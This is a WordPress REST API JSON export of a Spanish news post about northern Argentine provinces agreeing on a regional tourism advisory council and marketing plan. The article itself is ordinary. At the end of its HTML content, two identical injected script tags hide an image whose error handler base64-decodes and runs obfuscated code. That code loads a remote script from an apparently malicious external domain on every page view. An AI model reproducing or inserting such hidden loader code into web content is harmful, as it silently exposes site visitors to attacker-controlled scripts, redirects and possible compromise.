{"id":3948,"date":"2024-04-24T11:32:46","date_gmt":"2024-04-24T14:32:46","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3948"},"modified":"2025-08-13T23:56:47","modified_gmt":"2025-08-14T02:56:47","slug":"el-norte-argentino-con-la-firme-decision-de-crecer-a-pesar-de-la-dificil-coyuntura","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3948","title":{"rendered":"El Norte argentino con la firme decisi\u00f3n de crecer a pesar de la dif\u00edcil coyuntura"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-17d694369f623b488ef33a80279ee717\" style=\"background-color:#90092b\"><em>Ministros y secretarios de turismo de las provincias de la regi\u00f3n, definieron acciones concretas: Crear un Consejo Asesor (P\u00fablico-Privado) regional, conformar un equipo de promoci\u00f3n y marketing y avanzar en la elaboraci\u00f3n de un plan estrat\u00e9gico.<\/em><\/h4>\n\n\n\n<p>A trav\u00e9s del Ente Norte, autoridades tur\u00edsticas de Catamarca, Jujuy, La Rioja, Salta, Santiago del Estero y Tucum\u00e1n, se reunieron en esta \u00faltima provincia para definir un plan de trabajo concreto; entre las principales decisiones, se destaca la creaci\u00f3n de un espacio permanente que articule el sector p\u00fablico con el privado en un Consejo Asesor.<\/p>\n\n\n\n<p>En San Miguel de Tucum\u00e1n, el presidente del Ente y ministro de Turismo y Deportes de Salta,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, encabez\u00f3 el encuentro junto al presidente del Ente Turismo Tucum\u00e1n, Domingo Amaya. Adem\u00e1s, estuvieron la secretaria de Turismo de Catamarca, Vange Quarin; el ministro de Cultura y Turismo de Jujuy Federico Posadas y el secretario de Turismo Diego Valdecantos; el subsecretario de Turismo de Santiago del Estero, Nelson Bravo; y el ministro de Turismo y Culturas de La Rioja, Gustavo Luna.<\/p>\n\n\n\n<p>En la agenda del d\u00eda, se destaca la conformaci\u00f3n de un equipo en el Ente Norte que trabajar\u00e1 en un plan de marketing y promoci\u00f3n, pero adem\u00e1s, como gu\u00eda de trabajo, se iniciar\u00e1 un proceso de desarrollo de un plan estrat\u00e9gico del Norte argentino que permita un crecimiento de la actividad en el plano nacional, pero fundamentalmente en el internacional.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11724-el-norte-argentino-con-la-firme-decision-de-crecer-a-pesar-de-la-dificil-coyuntura.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11724-el-norte-argentino-con-la-firme-decision-de-crecer-a-pesar-de-la-dificil-coyuntura.jpg\" alt=\"El Norte argentino con la firme decisi\u00f3n de crecer a pesar de la dif\u00edcil coyuntura.\"\/><\/a><\/figure>\n\n\n\n<p>En materia de promoci\u00f3n, coincidieron en que la regi\u00f3n con sus 7 millones de habitantes, brinda muchas oportunidades de crecimiento. Por otra parte, se decidi\u00f3 la continuidad del programa Aliados Estrat\u00e9gicos que potencia la venta de la regi\u00f3n en mercados europeos.<\/p>\n\n\n\n<p>Adem\u00e1s, se defini\u00f3 que el Foro de Turismo del Norte se realice este a\u00f1o en Catamarca el 5 de septiembre continuando con la proyecci\u00f3n hacia la internacionalizaci\u00f3n. Un d\u00eda despu\u00e9s, se realizar\u00e1 una ronda de negocios organizada por el sector privado destinada a empresas y emprendedores de la regi\u00f3n.<\/p>\n\n\n\n<p>Con respecto a la participaci\u00f3n del sector privado, en Tucum\u00e1n se llev\u00f3 a cabo un encuentro con 25 dirigentes de entidades tur\u00edsticas del Norte argentino, donde se defini\u00f3 la creaci\u00f3n del Consejo Asesor regional donde tendr\u00e1 presencia permanente un representante por provincia del sector privado.<\/p>\n\n\n\n<p>\u00abEs un orgullo haber presidido la primera reuni\u00f3n, el Norte argentino ha demostrado en los momentos dif\u00edciles la uni\u00f3n, el trabajo en equipo, la planificaci\u00f3n y decisi\u00f3n pol\u00edtica de sobrellevar este momento de la actividad tur\u00edstica. &nbsp;Vamos a sentar las bases que permitan transitar la coyuntura pero tambi\u00e9n para el crecimiento de la regi\u00f3n\u201d, se\u00f1al\u00f3 Pe\u00f1a.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-norte-argentino-con-la-firme-decision-de-crecer-a-pesar-de-la-dificil-coyuntura-95188\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ministros y secretarios de turismo de las provincias de la regi\u00f3n, definieron acciones concretas: Crear un Consejo Asesor (P\u00fablico-Privado) regional, conformar un equipo de promoci\u00f3n y marketing y avanzar en la elaboraci\u00f3n de un plan estrat\u00e9gico. A trav\u00e9s del Ente Norte, autoridades tur\u00edsticas de Catamarca, Jujuy, La Rioja, Salta, Santiago del Estero y Tucum\u00e1n, se [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3949,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-3948","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3948"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3948"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3948\/revisions"}],"predecessor-version":[{"id":6798,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3948\/revisions\/6798"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3949"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3948"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3948"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3948"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}